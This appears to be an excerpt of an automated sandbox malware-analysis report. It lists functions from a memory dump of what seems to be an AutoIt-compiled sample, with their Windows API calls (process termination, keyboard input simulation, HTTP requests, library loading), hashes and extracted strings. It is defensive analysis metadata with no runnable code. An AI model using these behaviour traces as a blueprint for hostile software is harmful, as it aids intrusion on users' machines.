                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: efaf6043bc9331b27e6ae5d8d8e8a61b5f8578ee4d8981e5161ab3b4f8107534
                                                  • Instruction ID: 9829d7a59d40cef3fffefbee2e23cb85e9988208bed0977eeb657fffc48c5676
                                                  • Opcode Fuzzy Hash: efaf6043bc9331b27e6ae5d8d8e8a61b5f8578ee4d8981e5161ab3b4f8107534
                                                  • Instruction Fuzzy Hash: B60148B09027597DE3008F5A8C85B56FEA8FF19354F00411BA15847941C7B5A868CBE5
                                                  Function 00C253E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C253F9
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C2540F
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00C2541E
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C2542D
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C25437
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C2543E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: 38cdf3a0e95b172e8dd780e34aed3c2a4aac42308c9ce26a7a06ce3e344b759e
                                                  • Instruction ID: 8df405144f5de7abe8034495b974888ed9c647894a716931a57f1aecc9315e6e
                                                  • Opcode Fuzzy Hash: 38cdf3a0e95b172e8dd780e34aed3c2a4aac42308c9ce26a7a06ce3e344b759e
                                                  • Instruction Fuzzy Hash: 17F01D36641558BBE7215BA29C0DFEF7A7CFBC7B11F00016DFA04D106196A11A0286B5
                                                  Function 00C27230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00C27243
                                                  • EnterCriticalSection.KERNEL32(?,?,00BD0EE4,?,?), ref: 00C27254
                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00BD0EE4,?,?), ref: 00C27261
                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00BD0EE4,?,?), ref: 00C2726E
                                                    • Part of subcall function 00C26C35: CloseHandle.KERNEL32(00000000,?,00C2727B,?,00BD0EE4,?,?), ref: 00C26C3F
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C27281
                                                  • LeaveCriticalSection.KERNEL32(?,?,00BD0EE4,?,?), ref: 00C27288
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: 89a77ecfd9e48f0831644c0135da9c72f938562c0f306356d0bde8aa44daa4f7
                                                  • Instruction ID: 344c77e5e09d34ae0f5676822ca4027679487fa5de1bd8e510f7466c295b7d76
                                                  • Opcode Fuzzy Hash: 89a77ecfd9e48f0831644c0135da9c72f938562c0f306356d0bde8aa44daa4f7
                                                  • Instruction Fuzzy Hash: 9DF05E3A540612EBE7212B64ED8CBDF7769FF46702B100639F503914A1CBB65912CB60
                                                  Function 00C18992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C1899D
                                                  • UnloadUserProfile.USERENV(?,?), ref: 00C189A9
                                                  • CloseHandle.KERNEL32(?), ref: 00C189B2
                                                  • CloseHandle.KERNEL32(?), ref: 00C189BA
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C189C3
                                                  • HeapFree.KERNEL32(00000000), ref: 00C189CA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  • Opcode ID: f66d5c506a8e8cf3b58264b13c60e80850ee8c6c1c26f258378fc94e5c03ef4f
                                                  • Instruction ID: 2959ec77d237cef1798e0cd7cb7b8b05b8089c7ea6a786a62965060cbffe3acf
                                                  • Opcode Fuzzy Hash: f66d5c506a8e8cf3b58264b13c60e80850ee8c6c1c26f258378fc94e5c03ef4f
                                                  • Instruction Fuzzy Hash: EEE0527A104505FBDA021FE5EC0CB5EBBA9FB8A762B508639F21981470CB329462DB50
                                                  Function 00C385ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C38613
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C38722
                                                  • VariantClear.OLEAUT32(?), ref: 00C3889A
                                                    • Part of subcall function 00C27562: VariantInit.OLEAUT32(00000000), ref: 00C275A2
                                                    • Part of subcall function 00C27562: VariantCopy.OLEAUT32(00000000,?), ref: 00C275AB
                                                    • Part of subcall function 00C27562: VariantClear.OLEAUT32(00000000), ref: 00C275B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  • Opcode ID: 919489e7df7a6811beab1de0f115d299a0cbf0bf7d517ba117956efc960357a2
                                                  • Instruction ID: 3c15f743eddf5c14f79f01e9c05a9789891a72e3b9dfb1ab12856df7e1ca15fe
                                                  • Opcode Fuzzy Hash: 919489e7df7a6811beab1de0f115d299a0cbf0bf7d517ba117956efc960357a2
                                                  • Instruction Fuzzy Hash: DE917C746083019FCB10EF25C48595ABBF4FF89714F14896DF89A8B361DB30E949CB92
                                                  Function 00C22A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BDFC86: _wcscpy.LIBCMT ref: 00BDFCA9
                                                  • _memset.LIBCMT ref: 00C22B87
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C22BB6
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C22C69
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C22C97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  • Opcode ID: f8eea509c4a1c6bc87baaa482cff6ac6724ab4e3269f2912d76f83f4163b7385
                                                  • Instruction ID: 47d19af74723c391c93cc1956251c1aed144e4d173e00becf5fc9759a33f27a2
                                                  • Opcode Fuzzy Hash: f8eea509c4a1c6bc87baaa482cff6ac6724ab4e3269f2912d76f83f4163b7385
                                                  • Instruction Fuzzy Hash: 8051B171508321ABE725AF28E845A6FBBE4EF49350F040A2DF8A5D7690DBB0CE44D752
                                                  Function 00C1D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C1D5D4
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C1D60A
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C1D61B
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C1D69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
                                                  • Opcode ID: 42b5710aa73b004f5f6737ee615560da9a265bb4290e9aa94d77b3df9b45d4e2
                                                  • Instruction ID: d35116baa350aa3a8cbb10324359131fa1eb08592dfba7910b7f89fa802a0222
                                                  • Opcode Fuzzy Hash: 42b5710aa73b004f5f6737ee615560da9a265bb4290e9aa94d77b3df9b45d4e2
                                                  • Instruction Fuzzy Hash: 414180B5600204EFDB15CF54C884BDA7BB9EF46310F1585ADBC0A9F209D7B1DA84EBA0
                                                  Function 00C22753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C227C0
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C227DC
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00C22822
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C85890,00000000), ref: 00C2286B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  • Opcode ID: 7d81aa91af000d692d91c2fd29e5ef5d2a2972991e1ec45077c1e7ea5c3d403c
                                                  • Instruction ID: 8ad02d134cc110c099edc8a63fb152c9498fe5133916b9a6fa7e08e266e64c1d
                                                  • Opcode Fuzzy Hash: 7d81aa91af000d692d91c2fd29e5ef5d2a2972991e1ec45077c1e7ea5c3d403c
                                                  • Instruction Fuzzy Hash: DC41CF72204351AFD720DF24E884F6ABBE8EF85314F04492DF8A6972D1DB70E905CB62
                                                  Function 00C20AD6 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105keyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C20B27
                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C20B43
                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C20BA9
                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C20BFB
                                                  Strings
                                                  • jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak, xrefs: 00C20B5D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID: jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak
                                                  • API String ID: 432972143-549041074
                                                  • Opcode ID: 69262673725f796d056105a3b42dfd04a7fd5dbe669de7e43789d3e6400f33fd
                                                  • Instruction ID: 02d20f68d9cd340a5d5bd5e7ca528fedeffe7bb445f5c078a6fd10e05b63fab4
                                                  • Opcode Fuzzy Hash: 69262673725f796d056105a3b42dfd04a7fd5dbe669de7e43789d3e6400f33fd
                                                  • Instruction Fuzzy Hash: 68314B70D44628AFFF308B25AC05BFEBBA5AB45315F24425BF4A0519D2C3748A819751
                                                  Function 00C20C11 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101keyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00C20C66
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C20C82
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C20CE1
                                                  • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00C20D33
                                                  Strings
                                                  • jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak, xrefs: 00C20C9F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID: jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak
                                                  • API String ID: 432972143-549041074
                                                  • Opcode ID: 53a5628e611ff881a5f818558e6eec3d71d398ebb1a4917cdd1d228dfdd1ca46
                                                  • Instruction ID: 1d92af1090a934be77acd6f7519a4655aacaa6423c6a664f0d79e89cee5266ff
                                                  • Opcode Fuzzy Hash: 53a5628e611ff881a5f818558e6eec3d71d398ebb1a4917cdd1d228dfdd1ca46
                                                  • Instruction Fuzzy Hash: B8315A709002386EFF348B65AC047FEBBA6BB46310F24431FE4A0529D2C3759A46D7A2
                                                  Function 00C3D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C3D7C5
                                                    • Part of subcall function 00BC784B: _memmove.LIBCMT ref: 00BC7899
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower_memmove
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 3425801089-567219261
                                                  • Opcode ID: 0f2fa084e5fdee1a6377006fba5952986a34b05e95f51217c28f956b24321bba
                                                  • Instruction ID: 6a7eac1cf04818981f09456bb6e6ff29e0fef2ac4f2ad4c0578bfbe7393ee3c0
                                                  • Opcode Fuzzy Hash: 0f2fa084e5fdee1a6377006fba5952986a34b05e95f51217c28f956b24321bba
                                                  • Instruction Fuzzy Hash: CC31B071914609ABCF00EF54CC51AEEB3F4FF14320F1086A9F826976D1DB71A945CB80
                                                  Function 00C18E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C18F14
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C18F27
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C18F57
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$_memmove$ClassName
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 365058703-1403004172
                                                  • Opcode ID: a14f6a22d1b8ec9d0b06e668f8ae7859d6d7e159845b0bc598ececba19714a4d
                                                  • Instruction ID: f6327b630a81232a2146e6964b23c92fa43feedac7daccff227d8301e94b4a88
                                                  • Opcode Fuzzy Hash: a14f6a22d1b8ec9d0b06e668f8ae7859d6d7e159845b0bc598ececba19714a4d
                                                  • Instruction Fuzzy Hash: 77210475A05108BADB14ABB0CC85EFFB7B9DF06360F04416DF425A71E0DF75598AAA20
                                                  Function 00C3182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C3184C
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C31872
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C318A2
                                                  • InternetCloseHandle.WININET(00000000), ref: 00C318E9
                                                    • Part of subcall function 00C32483: GetLastError.KERNEL32(?,?,00C31817,00000000,00000000,00000001), ref: 00C32498
                                                    • Part of subcall function 00C32483: SetEvent.KERNEL32(?,?,00C31817,00000000,00000000,00000001), ref: 00C324AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                  • String ID:
                                                  • API String ID: 3113390036-3916222277
                                                  • Opcode ID: 7f420d7bf46bb00404cefd7e9516740acc5b57e7c479a49371161a0bf5af48aa
                                                  • Instruction ID: 54a6afb0d79781fe4263bf0bf16bfe3c7c7b6e4ca4817388c46e42cc58626348
                                                  • Opcode Fuzzy Hash: 7f420d7bf46bb00404cefd7e9516740acc5b57e7c479a49371161a0bf5af48aa
                                                  • Instruction Fuzzy Hash: 8221CFB1520308BFEB119F65CC85FBF77EDEB49744F14412AF805A6280EB248E05A7B6
                                                  Function 00C463E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BC1D73
                                                    • Part of subcall function 00BC1D35: GetStockObject.GDI32(00000011), ref: 00BC1D87
                                                    • Part of subcall function 00BC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC1D91
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C46461
                                                  • LoadLibraryW.KERNEL32(?), ref: 00C46468
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C4647D
                                                  • DestroyWindow.USER32(?), ref: 00C46485
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  • Opcode ID: 793eb442746f7b877005a223170c3c0fac6be4c88eeb380a46aaa284c2866f88
                                                  • Instruction ID: 89e9e267d09f0e717a1e76df0c20ae06c4bd8228141eace00d784cb649aec4f4
                                                  • Opcode Fuzzy Hash: 793eb442746f7b877005a223170c3c0fac6be4c88eeb380a46aaa284c2866f88
                                                  • Instruction Fuzzy Hash: E9219D75200205BFEF108FA4DC80FBB37ADFB5A364F109629FA20921A4D771DC51A762
                                                  Function 00C26D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00C26DBC
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C26DEF
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00C26E01
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C26E3B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
